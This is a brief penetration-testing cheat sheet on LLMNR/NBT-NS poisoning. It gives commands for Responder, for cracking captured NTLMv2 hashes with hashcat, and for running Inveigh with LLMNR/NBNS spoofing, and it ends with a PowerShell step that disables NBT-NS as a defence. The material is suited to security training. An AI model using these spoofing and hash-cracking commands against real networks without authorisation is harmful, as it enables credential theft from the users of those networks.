LLMNR/NTB-NS Poisoning
Step 1: Display Responder Help Menu
responder -h
Displays usage instructions and various available options in Responder from a Linux-based host.
Step 2: Crack NTLMv2 Hashes with Hashcat
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
Uses Hashcat to crack NTLMv2 (-m 5600
) hashes captured by Responder and saved in a file (forend_ntlmv2
). Cracking is performed using the specified wordlist.
Step 3: Import Inveigh PowerShell Module
Import-Module .\Inveigh.ps1
Uses the Import-Module
PowerShell cmdlet to import the Windows-based tool Inveigh.ps1
.
Step 4: List Invoke-Inveigh Parameters
(Get-Command Invoke-Inveigh).Parameters
Outputs available options and functionalities for Invoke-Inveigh
. Performed from a Windows-based host.
Step 5: Start Inveigh with LLMNR & NBNS Spoofing
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Starts Inveigh on a Windows-based host with LLMNR & NBNS spoofing enabled. Results are outputted to a file.
Step 6: Start Inveigh C# Implementation
.\Inveigh.exe
Starts the C# implementation of Inveigh from a Windows-based host.
Step 7: Disable NBT-NS on Windows
$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey | foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose }
PowerShell script used to disable NBT-NS on a Windows host.
Last updated